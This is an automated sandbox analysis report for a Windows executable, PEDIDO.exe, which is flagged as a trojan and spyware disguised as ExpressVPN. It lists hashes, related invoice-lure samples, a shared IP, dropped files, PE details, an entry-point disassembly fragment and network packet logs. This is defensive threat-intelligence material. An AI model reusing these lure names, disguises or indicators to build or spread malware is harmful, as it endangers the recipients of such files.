                                    Detection:MAL
                                    Classification:mal100.spre.troj.spyw.evad.winEXE@6/3@5/3
                                    EGA Information:Failed
                                    HDC Information:Failed
                                    HCA Information:
                                    • Successful, ratio: 96%
                                    • Number of executed functions: 0
                                    • Number of non-executed functions: 0
                                    Cookbook Comments:
                                    • Adjust boot time
                                    • Enable AMSI
                                    • Found application associated with file extension: .exe
                                    Warnings:
                                    Show All
                                    • Exclude process from analysis (whitelisted): dllhost.exe, BackgroundTransferHost.exe, RuntimeBroker.exe, backgroundTaskHost.exe, svchost.exe
                                    • TCP Packets have been reduced to 100
                                    • Excluded IPs from analysis (whitelisted): 51.105.236.244, 20.82.210.154, 92.123.195.35, 92.123.195.83, 92.123.195.90, 92.123.195.43, 92.123.195.98, 92.123.195.59, 92.123.195.67, 92.123.195.44, 92.123.195.50, 209.197.3.8, 104.89.32.83
                                    • Excluded domains from analysis (whitelisted): e8652.dscx.akamaiedge.net, wu-shim.trafficmanager.net, ctldl.windowsupdate.com, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, cds.d2s7q6s2.hwcdn.net, wdcp.microsoft.com, a1449.dscg2.akamai.net, wd-prod-cp.trafficmanager.net, arc.msn.com, wdcpalt.microsoft.com, wd-prod-cp-eu-west-1-fe.westeurope.cloudapp.azure.com, arc.trafficmanager.net, img-prod-cms-rt-microsoft-com.akamaized.net, crl.root-x1.letsencrypt.org.edgekey.net
                                    • Not all processes where analyzed, report is missing behavior information
                                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                    • Report size getting too big, too many NtReadVirtualMemory calls found.

                                    Simulations

                                    Behavior and APIs

                                    TimeTypeDescription
                                    19:30:53API Interceptor2705x Sleep call for process: RegAsm.exe modified

                                    Joe Sandbox View / Context

                                    IPs

                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                    188.93.227.195ZAM#U00d3WIENIE.exeGet hashmaliciousBrowse
                                      FACTURA.exeGet hashmaliciousBrowse
                                        Fra FAC-ES101-2107-03806.doc.exeGet hashmaliciousBrowse
                                          ZAM#U00d3WIENIE.exeGet hashmaliciousBrowse
                                            FAKTURA I PARAGONY.exeGet hashmaliciousBrowse
                                              COPIA DE PAGO.exeGet hashmaliciousBrowse
                                                orientite.exeGet hashmaliciousBrowse
                                                  PO.exeGet hashmaliciousBrowse
                                                    DDC50015.exeGet hashmaliciousBrowse
                                                      Facturas Pagadas al Vencimiento.exeGet hashmaliciousBrowse
                                                        DHL00051021_PDF.exeGet hashmaliciousBrowse
                                                          FACTURA.exeGet hashmaliciousBrowse
                                                            FACTURA.exeGet hashmaliciousBrowse
                                                              seeds.exeGet hashmaliciousBrowse
                                                                Product LIsts.exeGet hashmaliciousBrowse
                                                                  FACTURA Y ALBARANES_pdf.exeGet hashmaliciousBrowse
                                                                    Scan.exeGet hashmaliciousBrowse
                                                                      Ticari Hesap #U00d6zetiniz.exeGet hashmaliciousBrowse
                                                                        Struggleres5.exeGet hashmaliciousBrowse
                                                                          BBVA-Confirming Remesas Aceptadas.exeGet hashmaliciousBrowse

                                                                            Domains

                                                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext

                                                                            ASN

                                                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                            CLARANET-ASClaraNETLTDGBcLbBJb6vzOGet hashmaliciousBrowse
                                                                            • 138.249.57.174
                                                                            ZAM#U00d3WIENIE.exeGet hashmaliciousBrowse
                                                                            • 188.93.227.195
                                                                            FACTURA.exeGet hashmaliciousBrowse
                                                                            • 188.93.227.195
                                                                            Fra FAC-ES101-2107-03806.doc.exeGet hashmaliciousBrowse
                                                                            • 188.93.227.195
                                                                            ZAM#U00d3WIENIE.exeGet hashmaliciousBrowse
                                                                            • 188.93.227.195
                                                                            b3astmode.arm7Get hashmaliciousBrowse
                                                                            • 80.168.0.124
                                                                            jew.arm7Get hashmaliciousBrowse
                                                                            • 212.49.223.28
                                                                            sora.arm7Get hashmaliciousBrowse
                                                                            • 89.206.151.169
                                                                            FAKTURA I PARAGONY.exeGet hashmaliciousBrowse
                                                                            • 188.93.227.195
                                                                            COPIA DE PAGO.exeGet hashmaliciousBrowse
                                                                            • 188.93.227.195
                                                                            sora.armGet hashmaliciousBrowse
                                                                            • 195.102.64.245
                                                                            LSCtJ6YbhBGet hashmaliciousBrowse
                                                                            • 195.102.64.215
                                                                            orientite.exeGet hashmaliciousBrowse
                                                                            • 188.93.227.195
                                                                            PO.exeGet hashmaliciousBrowse
                                                                            • 188.93.227.195
                                                                            DDC50015.exeGet hashmaliciousBrowse
                                                                            • 188.93.227.195
                                                                            UnHAnaAW.x86Get hashmaliciousBrowse
                                                                            • 212.49.223.21
                                                                            yR25n6pfMSGet hashmaliciousBrowse
                                                                            • 195.157.0.198
                                                                            Facturas Pagadas al Vencimiento.exeGet hashmaliciousBrowse
                                                                            • 188.93.227.195
                                                                            DHL00051021_PDF.exeGet hashmaliciousBrowse
                                                                            • 188.93.227.195
                                                                            FACTURA.exeGet hashmaliciousBrowse
                                                                            • 188.93.227.195

                                                                            JA3 Fingerprints

                                                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                            37f463bf4616ecd445d4a1937da06e19SecuriteInfo.com.Ransom.Stop.Z5.27157.exeGet hashmaliciousBrowse
                                                                            • 172.217.168.46
                                                                            • 172.217.18.97
                                                                            Jrsuarez-62643-5799-80-950985.HTMGet hashmaliciousBrowse
                                                                            • 172.217.168.46
                                                                            • 172.217.18.97
                                                                            Jrsuarez-62643-5799-80-950985.HTMGet hashmaliciousBrowse
                                                                            • 172.217.168.46
                                                                            • 172.217.18.97
                                                                            ZAM#U00d3WIENIE.exeGet hashmaliciousBrowse
                                                                            • 172.217.168.46
                                                                            • 172.217.18.97
                                                                            Jrsuarez-62643-5799-80-950985.HTMGet hashmaliciousBrowse
                                                                            • 172.217.168.46
                                                                            • 172.217.18.97
                                                                            Jrsuarez-62643-5799-80-950985.HTMGet hashmaliciousBrowse
                                                                            • 172.217.168.46
                                                                            • 172.217.18.97
                                                                            UZlg2Sq2pQ.exeGet hashmaliciousBrowse
                                                                            • 172.217.168.46
                                                                            • 172.217.18.97
                                                                            DOC 13102021.exeGet hashmaliciousBrowse
                                                                            • 172.217.168.46
                                                                            • 172.217.18.97
                                                                            Halkbank_Ekstre_20211310_082357_541079.exeGet hashmaliciousBrowse
                                                                            • 172.217.168.46
                                                                            • 172.217.18.97
                                                                            ATT10821.htmlGet hashmaliciousBrowse
                                                                            • 172.217.168.46
                                                                            • 172.217.18.97
                                                                            Delivery note_241493.exeGet hashmaliciousBrowse
                                                                            • 172.217.168.46
                                                                            • 172.217.18.97
                                                                            Delivery note_241493.exeGet hashmaliciousBrowse
                                                                            • 172.217.168.46
                                                                            • 172.217.18.97
                                                                            FACTURA.exeGet hashmaliciousBrowse
                                                                            • 172.217.168.46
                                                                            • 172.217.18.97
                                                                            REQUIREMENT.exeGet hashmaliciousBrowse
                                                                            • 172.217.168.46
                                                                            • 172.217.18.97
                                                                            Statement of Account.exeGet hashmaliciousBrowse
                                                                            • 172.217.168.46
                                                                            • 172.217.18.97
                                                                            HUD-Closing-Statement.htmlGet hashmaliciousBrowse
                                                                            • 172.217.168.46
                                                                            • 172.217.18.97
                                                                            zrArDsoum0.exeGet hashmaliciousBrowse
                                                                            • 172.217.168.46
                                                                            • 172.217.18.97
                                                                            Fra FAC-ES101-2107-03806.doc.exeGet hashmaliciousBrowse
                                                                            • 172.217.168.46
                                                                            • 172.217.18.97
                                                                            correction HAWB.exeGet hashmaliciousBrowse
                                                                            • 172.217.168.46
                                                                            • 172.217.18.97
                                                                            UZWdHg3hWA.exeGet hashmaliciousBrowse
                                                                            • 172.217.168.46
                                                                            • 172.217.18.97

                                                                            Dropped Files

                                                                            No context

                                                                            Created / dropped Files

                                                                            C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2D85F72862B55C4EADD9E66E06947F3D
                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):1391
                                                                            Entropy (8bit):7.705940075877404
                                                                            Encrypted:false
                                                                            SSDEEP:24:ooVdTH2NMU+I3E0Ulcrgdaf3sWrATrnkC4EmCUkmGMkfQo1fSZotWzD1:ooVguI3Kcx8WIzNeCUkJMmSuMX1
                                                                            MD5:0CD2F9E0DA1773E9ED864DA5E370E74E
                                                                            SHA1:CABD2A79A1076A31F21D253635CB039D4329A5E8
                                                                            SHA-256:96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6
                                                                            SHA-512:3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910
                                                                            Malicious:false
                                                                            Reputation:moderate, very likely benign file
                                                                            Preview: 0..k0..S............@.YDc.c...0...*.H........0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10...150604110438Z..350604110438Z0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10.."0...*.H.............0..........$s..7.+W(.....8..n<.W.x.u...jn..O(..h.lD...c...k....1.!~.3<.H..y.....!.K...qiJffl.~<p..)"......K...~....G.|.H#S.8.O.o...IW..t../.8.{.p!.u.0<.....c...O..K~.....w...{J.L.%.p..)..S$........J.?..aQ.....cq...o[...\4ylv.;.by.../&.....................6....7..6u...r......I.....*.A..v........5/(.l....dwnG7..Y^h..r...A)>Y>.&.$...Z.L@.F....:Qn.;.}r...xY.>Qx....../..>{J.Ks......P.|C.t..t.....0.[q6....00\H..;..}`...).........A.......|.;F.H*..v.v..j.=...8.d..+..(.....B.".'].y...p..N..:..'Qn..d.3CO......B0@0...U...........0...U.......0....0...U......y.Y.{....s.....X..n0...*.H.............U.X....P.....i ')..au\.n...i/..VK..s.Y.!.~.Lq...`.9....!V..P.Y...Y.............b.E.f..|o..;.....'...}~.."......
                                                                            C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\2D85F72862B55C4EADD9E66E06947F3D
                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                            File Type:data
                                                                            Category:modified
                                                                            Size (bytes):192
                                                                            Entropy (8bit):2.773803200765873
                                                                            Encrypted:false
                                                                            SSDEEP:3:kkFklxaXhyklfllXlE/zMcDllzltNNX8RolJuRdyo1dlUKlGXJlDdt:kKHXM1D/RNMa8Rdy+UKcXP
                                                                            MD5:2818826B23F74B0AA6F22589C4F3534E
                                                                            SHA1:AB51AA997D3FB29BE2AC75B29EF05E6520A943DE
                                                                            SHA-256:E5AE1C6CABCBFA56BEC5D7F89A82E74B1199CFAD9967C98AB9EF7EF134544EED
                                                                            SHA-512:30F39E9CC0C6A7B3066C56CADAC023D9FBE263EA4F9270FA6F4CBE8D204E358EB59F313CFCF97732A5AB118108E1FC989AE51A27C06BED39E5A0619309E86E37
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            Preview: p...... .........?2.v...(....................................................... ..........~...<X..............o...h.t.t.p.:././.x.1...i...l.e.n.c.r...o.r.g./...".5.a.6.2.8.1.5.c.-.5.6.f."...
                                                                            \Device\ConDrv
                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                            File Type:ASCII text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):30
                                                                            Entropy (8bit):3.964735178725505
                                                                            Encrypted:false
                                                                            SSDEEP:3:IBVFBWAGRHneyy:ITqAGRHner
                                                                            MD5:9F754B47B351EF0FC32527B541420595
                                                                            SHA1:006C66220B33E98C725B73495FE97B3291CE14D9
                                                                            SHA-256:0219D77348D2F0510025E188D4EA84A8E73F856DEB5E0878D673079D05840591
                                                                            SHA-512:C6996379BCB774CE27EEEC0F173CBACC70CA02F3A773DD879E3A42DA554535A94A9C13308D14E873C71A338105804AFFF32302558111EE880BA0C41747A08532
                                                                            Malicious:false
                                                                            Reputation:moderate, very likely benign file
                                                                            Preview: NordVPN directory not found!..

                                                                            Static File Info

                                                                            General

                                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                            Entropy (8bit):5.757968809183827
                                                                            TrID:
                                                                            • Win32 Executable (generic) a (10002005/4) 99.15%
                                                                            • Win32 Executable Microsoft Visual Basic 6 (82127/2) 0.81%
                                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                                            • DOS Executable Generic (2002/1) 0.02%
                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                            File name:PEDIDO.exe
                                                                            File size:98304
                                                                            MD5:83046fa32e563289dbd98efe27f884f4
                                                                            SHA1:fdacb1537161c011f5803471b6971225010d4e71
                                                                            SHA256:6b3d06b20b3ae5a3dd8d3a2eb9eb1f1a86d9ba5eb59f5ef75cfa1b2f28dcfd6c
                                                                            SHA512:9669be8d89c08729dbb62da4cdf54a6dc43fe7b59ecc93ac756a6ed35f42ba38981316465a2b286e124656350993d76f7e6fd5ed51e88324e9d66edcb26df282
                                                                            SSDEEP:1536:t9BDgiAEkkSAIJQpaehY0gB0PXUhzYMns1h7IuDhaD:t9BXAZAADehhgB0PXAzYMnekuDha
                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........i.......................*..............Rich....................PE..L.....(N.................@...0...............P....@........

                                                                            File Icon

                                                                            Icon Hash:69e1c892f664c884

                                                                            Static PE Info

                                                                            General

                                                                            Entrypoint:0x4012b4
                                                                            Entrypoint Section:.text
                                                                            Digitally signed:false
                                                                            Imagebase:0x400000
                                                                            Subsystem:windows gui
                                                                            Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                                                            DLL Characteristics:
                                                                            Time Stamp:0x4E28E7F0 [Fri Jul 22 03:01:04 2011 UTC]
                                                                            TLS Callbacks:
                                                                            CLR (.Net) Version:
                                                                            OS Version Major:4
                                                                            OS Version Minor:0
                                                                            File Version Major:4
                                                                            File Version Minor:0
                                                                            Subsystem Version Major:4
                                                                            Subsystem Version Minor:0
                                                                            Import Hash:3d3cd1bd8dcc611a5734bf41f4e1a6a6

                                                                            Entrypoint Preview

                                                                            Instruction
                                                                            push 0041052Ch
                                                                            call 00007F8058553913h
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            xor byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            inc eax
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax+50h], ch
                                                                            mov dr0, esp
                                                                            push eax
                                                                            cmp dword ptr [ebp-71h], ecx
                                                                            sti
                                                                            fcomp st(0), st(3)
                                                                            push ebx
                                                                            stc
                                                                            pop esp
                                                                            xor dword ptr [eax], eax
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [ecx], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [ebp+45h], cl
                                                                            push esp
                                                                            push edx
                                                                            dec ecx
                                                                            dec ebx
                                                                            inc ebp
                                                                            push edx
                                                                            inc ebp
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add bh, bh
                                                                            int3
                                                                            xor dword ptr [eax], eax
                                                                            cmp dl, bh
                                                                            mov byte ptr [E39A3674h], al
                                                                            in eax, dx
                                                                            inc edi
                                                                            test eax, 46B9A7D4h
                                                                            shr byte ptr [edi], 1
                                                                            sbb dword ptr [ebx-6Ah], ebx
                                                                            sar byte ptr [ebx], 0000007Fh
                                                                            mov esp, FAA4446Eh
                                                                            mov ah, A2h
                                                                            xchg eax, esp
                                                                            jc 00007F805855399Ch
                                                                            pop es
                                                                            cmp cl, byte ptr [edi-53h]
                                                                            xor ebx, dword ptr [ecx-48EE309Ah]
                                                                            or al, 00h
                                                                            stosb
                                                                            add byte ptr [eax-2Dh], ah
                                                                            xchg eax, ebx
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            in eax, dx
                                                                            out dx, eax
                                                                            add byte ptr [eax], al
                                                                            adc eax, 00000009h
                                                                            adc byte ptr [eax], al
                                                                            outsd
                                                                            jbe 00007F8058553987h
                                                                            jc 00007F805855398Eh
                                                                            imul esp, dword ptr [ebx+65h], 6F69746Eh
                                                                            jne 00007F8058553995h
                                                                            insb
                                                                            jns 00007F8058553922h
                                                                            or eax, 00000601h

                                                                            Data Directories

                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x141340x28.text
                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x160000x1c2a.rsrc
                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x2300x20
                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x10000xf0.text
                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                            Sections

                                                                            NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                            .text0x10000x135280x14000False0.504711914063data6.20991689297IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                            .data0x150000xcc40x1000False0.00634765625data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                            .rsrc0x160000x1c2a0x2000False0.346557617188data3.68630783779IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                            Resources

                                                                            NameRVASizeTypeLanguageCountry
                                                                            CUSTOM0x1792c0x2feMS Windows icon resource - 1 icon, 32x32, 16 colorsEnglishUnited States
                                                                            CUSTOM0x1706e0x8beMS Windows icon resource - 1 icon, 32x32, 8 bits/pixelEnglishUnited States
                                                                            CUSTOM0x16d700x2feMS Windows icon resource - 1 icon, 32x32, 16 colors, 4 bits/pixelEnglishUnited States
                                                                            RT_ICON0x164c80x8a8data
                                                                            RT_GROUP_ICON0x164b40x14data
                                                                            RT_VERSION0x161a00x314dataEnglishUnited States

                                                                            Imports

                                                                            DLLImport
                                                                            MSVBVM60.DLL_CIcos, _adj_fptan, __vbaVarMove, __vbaFreeVar, __vbaStrVarMove, __vbaFreeVarList, _adj_fdiv_m64, __vbaFreeObjList, _adj_fprem1, __vbaHresultCheckObj, _adj_fdiv_m32, __vbaObjSet, _adj_fdiv_m16i, __vbaObjSetAddref, _adj_fdivr_m16i, __vbaVarTstLt, _CIsin, __vbaChkstk, EVENT_SINK_AddRef, __vbaStrCmp, _adj_fpatan, __vbaLateIdCallLd, EVENT_SINK_Release, _CIsqrt, EVENT_SINK_QueryInterface, __vbaExceptHandler, _adj_fprem, _adj_fdivr_m64, __vbaFPException, _CIlog, __vbaNew2, _adj_fdiv_m32i, _adj_fdivr_m32i, _adj_fdivr_m32, _adj_fdiv_r, __vbaVarTstNe, __vbaVarAdd, __vbaVarDup, _CIatan, __vbaStrMove, _allmul, _CItan, _CIexp, __vbaFreeObj, __vbaFreeStr

                                                                            Version Infos

                                                                            DescriptionData
                                                                            Translation0x0409 0x04b0
                                                                            LegalCopyrightExpressVPN
                                                                            InternalNameSkovslotte5
                                                                            FileVersion4.00
                                                                            CompanyNameExpressVPN
                                                                            LegalTrademarksExpressVPN
                                                                            CommentsExpressVPN
                                                                            ProductNameExpressVPN
                                                                            ProductVersion4.00
                                                                            FileDescriptionExpressVPN
                                                                            OriginalFilenameSkovslotte5.exe

                                                                            Possible Origin

                                                                            Language of compilation systemCountry where language is spokenMap
                                                                            EnglishUnited States

                                                                            Network Behavior

                                                                            Network Port Distribution

                                                                            TCP Packets

                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                            Oct 13, 2021 19:30:42.387279987 CEST49791443192.168.11.20172.217.168.46
                                                                            Oct 13, 2021 19:30:42.387356043 CEST44349791172.217.168.46192.168.11.20
                                                                            Oct 13, 2021 19:30:42.387491941 CEST49791443192.168.11.20172.217.168.46
                                                                            Oct 13, 2021 19:30:42.405452013 CEST49791443192.168.11.20172.217.168.46
                                                                            Oct 13, 2021 19:30:42.405504942 CEST44349791172.217.168.46192.168.11.20
                                                                            Oct 13, 2021 19:30:42.461417913 CEST44349791172.217.168.46192.168.11.20
                                                                            Oct 13, 2021 19:30:42.461617947 CEST49791443192.168.11.20172.217.168.46
                                                                            Oct 13, 2021 19:30:42.463624001 CEST44349791172.217.168.46192.168.11.20
                                                                            Oct 13, 2021 19:30:42.463845968 CEST49791443192.168.11.20172.217.168.46
                                                                            Oct 13, 2021 19:30:42.594398022 CEST49791443192.168.11.20172.217.168.46
                                                                            Oct 13, 2021 19:30:42.594427109 CEST44349791172.217.168.46192.168.11.20
                                                                            Oct 13, 2021 19:30:42.594860077 CEST44349791172.217.168.46192.168.11.20
                                                                            Oct 13, 2021 19:30:42.595037937 CEST49791443192.168.11.20172.217.168.46
                                                                            Oct 13, 2021 19:30:42.599278927 CEST49791443192.168.11.20172.217.168.46
                                                                            Oct 13, 2021 19:30:42.641928911 CEST44349791172.217.168.46192.168.11.20
                                                                            Oct 13, 2021 19:30:43.073204994 CEST44349791172.217.168.46192.168.11.20
                                                                            Oct 13, 2021 19:30:43.073370934 CEST44349791172.217.168.46192.168.11.20
                                                                            Oct 13, 2021 19:30:43.073405981 CEST49791443192.168.11.20172.217.168.46
                                                                            Oct 13, 2021 19:30:43.073544025 CEST49791443192.168.11.20172.217.168.46
                                                                            Oct 13, 2021 19:30:43.073646069 CEST44349791172.217.168.46192.168.11.20
                                                                            Oct 13, 2021 19:30:43.073786974 CEST44349791172.217.168.46192.168.11.20
                                                                            Oct 13, 2021 19:30:43.073802948 CEST49791443192.168.11.20172.217.168.46
                                                                            Oct 13, 2021 19:30:43.073985100 CEST49791443192.168.11.20172.217.168.46
                                                                            Oct 13, 2021 19:30:43.079370022 CEST49791443192.168.11.20172.217.168.46
                                                                            Oct 13, 2021 19:30:43.079469919 CEST44349791172.217.168.46192.168.11.20
                                                                            Oct 13, 2021 19:30:43.175817966 CEST49792443192.168.11.20172.217.18.97
                                                                            Oct 13, 2021 19:30:43.175874949 CEST44349792172.217.18.97192.168.11.20
                                                                            Oct 13, 2021 19:30:43.176008940 CEST49792443192.168.11.20172.217.18.97
                                                                            Oct 13, 2021 19:30:43.176366091 CEST49792443192.168.11.20172.217.18.97
                                                                            Oct 13, 2021 19:30:43.176403046 CEST44349792172.217.18.97192.168.11.20
                                                                            Oct 13, 2021 19:30:43.228849888 CEST44349792172.217.18.97192.168.11.20
                                                                            Oct 13, 2021 19:30:43.229124069 CEST49792443192.168.11.20172.217.18.97
                                                                            Oct 13, 2021 19:30:43.231875896 CEST44349792172.217.18.97192.168.11.20
                                                                            Oct 13, 2021 19:30:43.232131958 CEST49792443192.168.11.20172.217.18.97
                                                                            Oct 13, 2021 19:30:43.235616922 CEST49792443192.168.11.20172.217.18.97
                                                                            Oct 13, 2021 19:30:43.235656977 CEST44349792172.217.18.97192.168.11.20
                                                                            Oct 13, 2021 19:30:43.236287117 CEST44349792172.217.18.97192.168.11.20
                                                                            Oct 13, 2021 19:30:43.236433029 CEST49792443192.168.11.20172.217.18.97
                                                                            Oct 13, 2021 19:30:43.236912012 CEST49792443192.168.11.20172.217.18.97
                                                                            Oct 13, 2021 19:30:43.277967930 CEST44349792172.217.18.97192.168.11.20
                                                                            Oct 13, 2021 19:30:43.443548918 CEST44349792172.217.18.97192.168.11.20
                                                                            Oct 13, 2021 19:30:43.443720102 CEST49792443192.168.11.20172.217.18.97
                                                                            Oct 13, 2021 19:30:43.443756104 CEST49792443192.168.11.20172.217.18.97
                                                                            Oct 13, 2021 19:30:43.443907022 CEST44349792172.217.18.97192.168.11.20
                                                                            Oct 13, 2021 19:30:43.444078922 CEST49792443192.168.11.20172.217.18.97
                                                                            Oct 13, 2021 19:30:43.444113970 CEST49792443192.168.11.20172.217.18.97
                                                                            Oct 13, 2021 19:30:43.444547892 CEST44349792172.217.18.97192.168.11.20
                                                                            Oct 13, 2021 19:30:43.444732904 CEST49792443192.168.11.20172.217.18.97
                                                                            Oct 13, 2021 19:30:43.444773912 CEST49792443192.168.11.20172.217.18.97
                                                                            Oct 13, 2021 19:30:43.446343899 CEST44349792172.217.18.97192.168.11.20
                                                                            Oct 13, 2021 19:30:43.446531057 CEST44349792172.217.18.97192.168.11.20
                                                                            Oct 13, 2021 19:30:43.446554899 CEST49792443192.168.11.20172.217.18.97
                                                                            Oct 13, 2021 19:30:43.446590900 CEST44349792172.217.18.97192.168.11.20
                                                                            Oct 13, 2021 19:30:43.446836948 CEST49792443192.168.11.20172.217.18.97
                                                                            Oct 13, 2021 19:30:43.448163986 CEST44349792172.217.18.97192.168.11.20
                                                                            Oct 13, 2021 19:30:43.448437929 CEST49792443192.168.11.20172.217.18.97
                                                                            Oct 13, 2021 19:30:43.448503017 CEST44349792172.217.18.97192.168.11.20
                                                                            Oct 13, 2021 19:30:43.448801994 CEST49792443192.168.11.20172.217.18.97
                                                                            Oct 13, 2021 19:30:43.454200983 CEST44349792172.217.18.97192.168.11.20
                                                                            Oct 13, 2021 19:30:43.454430103 CEST49792443192.168.11.20172.217.18.97
                                                                            Oct 13, 2021 19:30:43.454534054 CEST44349792172.217.18.97192.168.11.20
                                                                            Oct 13, 2021 19:30:43.454741001 CEST49792443192.168.11.20172.217.18.97
                                                                            Oct 13, 2021 19:30:43.454786062 CEST44349792172.217.18.97192.168.11.20
                                                                            Oct 13, 2021 19:30:43.454988003 CEST49792443192.168.11.20172.217.18.97
                                                                            Oct 13, 2021 19:30:43.455028057 CEST44349792172.217.18.97192.168.11.20
                                                                            Oct 13, 2021 19:30:43.455147028 CEST44349792172.217.18.97192.168.11.20
                                                                            Oct 13, 2021 19:30:43.455280066 CEST49792443192.168.11.20172.217.18.97
                                                                            Oct 13, 2021 19:30:43.455327034 CEST44349792172.217.18.97192.168.11.20
                                                                            Oct 13, 2021 19:30:43.455338955 CEST49792443192.168.11.20172.217.18.97
                                                                            Oct 13, 2021 19:30:43.455626965 CEST49792443192.168.11.20172.217.18.97
                                                                            Oct 13, 2021 19:30:43.455670118 CEST44349792172.217.18.97192.168.11.20
                                                                            Oct 13, 2021 19:30:43.456015110 CEST49792443192.168.11.20172.217.18.97
                                                                            Oct 13, 2021 19:30:43.456070900 CEST44349792172.217.18.97192.168.11.20
                                                                            Oct 13, 2021 19:30:43.456347942 CEST49792443192.168.11.20172.217.18.97
                                                                            Oct 13, 2021 19:30:43.456427097 CEST44349792172.217.18.97192.168.11.20
                                                                            Oct 13, 2021 19:30:43.456672907 CEST49792443192.168.11.20172.217.18.97
                                                                            Oct 13, 2021 19:30:43.456731081 CEST44349792172.217.18.97192.168.11.20
                                                                            Oct 13, 2021 19:30:43.456942081 CEST49792443192.168.11.20172.217.18.97
                                                                            Oct 13, 2021 19:30:43.457223892 CEST44349792172.217.18.97192.168.11.20
                                                                            Oct 13, 2021 19:30:43.457433939 CEST49792443192.168.11.20172.217.18.97
                                                                            Oct 13, 2021 19:30:43.457483053 CEST44349792172.217.18.97192.168.11.20
                                                                            Oct 13, 2021 19:30:43.457629919 CEST49792443192.168.11.20172.217.18.97
                                                                            Oct 13, 2021 19:30:43.457828045 CEST44349792172.217.18.97192.168.11.20
                                                                            Oct 13, 2021 19:30:43.458034039 CEST49792443192.168.11.20172.217.18.97
                                                                            Oct 13, 2021 19:30:43.458074093 CEST44349792172.217.18.97192.168.11.20
                                                                            Oct 13, 2021 19:30:43.458277941 CEST49792443192.168.11.20172.217.18.97
                                                                            Oct 13, 2021 19:30:43.458504915 CEST44349792172.217.18.97192.168.11.20
                                                                            Oct 13, 2021 19:30:43.458713055 CEST49792443192.168.11.20172.217.18.97
